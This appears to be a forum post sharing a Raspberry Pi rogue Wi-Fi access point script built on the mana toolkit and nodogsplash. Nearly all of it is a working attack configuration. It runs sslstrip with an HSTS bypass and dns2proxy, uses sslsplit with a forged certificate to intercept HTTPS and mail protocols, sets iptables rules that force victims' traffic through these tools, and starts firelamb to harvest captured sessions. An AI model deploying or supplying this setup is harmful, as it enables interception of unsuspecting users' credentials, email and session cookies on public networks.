Jump to content

zakvuil

Members
  • Posts

    1
  • Joined

  • Last visited

Recent Profile Visitors

398 profile views

zakvuil's Achievements

Newbie

Newbie (1/14)

  1. Hi guys, I've got a Pi running up with the complete setup using mana and nodogsplash and a portal. There's a trick using nodogsplash and redirection ssl traffic using sslsplitter, because nodogsplash modifies the rulebase of iptables. Checkout the modified config: . . . #Starting Portal echo Starting Portal service apache2 start nodogsplash -f -c ~/mana/run-mana/spot/nodogsplash-portal.conf & sleep 5 #SSLStrip with HSTS bypass cd /usr/share/mana-toolkit/sslstrip-hsts/ python sslstrip.py -l 10080 -a -w /var/www/portals/spot/logs/sslstrip/sslstrip.log& python dns2proxy.py $phy& cd - #SSLSplit sslsplit -D -Z -S /var/lib/mana-toolkit/sslsplit -c /var/www/portals/spot/cert/spot-secure.crt -k /var/www/portals/spot/cert/spot-secure.key -O -l /var/www/portals/spot/logs/sslsplit/sslsplit-connect.log \ https 0.0.0.0 10443 \ ssl 0.0.0.0 10993 \ tcp 0.0.0.0 10143 \ ssl 0.0.0.0 10995 \ tcp 0.0.0.0 10110 \ ssl 0.0.0.0 10465 \ tcp 0.0.0.0 10025& iptables -t nat -D PREROUTING 1 iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10080 iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10443 iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10143 iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10993 iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10465 iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10025 iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10995 iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10110 iptables -t nat -A PREROUTING -i $phy -m mark --mark 0x200/0x700 -j ACCEPT iptables -t nat -A PREROUTING -i $phy -m mark --mark 0x400/0x700 -j ACCEPT iptables -t nat -A PREROUTING -i $phy -d 0.0.0.0/0 -p tcp --dport 53 -j ACCEPT iptables -t nat -A PREROUTING -i $phy -d 0.0.0.0/0 -p udp --dport 53 -j ACCEPT iptables -t nat -A PREROUTING -i $phy -d 10.0.0.1 -p tcp --dport 80 -j ACCEPT iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:2050 iptables -t nat -A PREROUTING -i $phy -j ACCEPT # Start FireLamb ~/mana/run-mana/spot/firelamb.py -i wlan0 -t /var/www/portals/spot/logs/sslsplit/ -s /var/www/portals/spot/logs/sslspl/sslsplit-connect.log& echo "Hit enter to kill me" read . . .
×
×
  • Create New...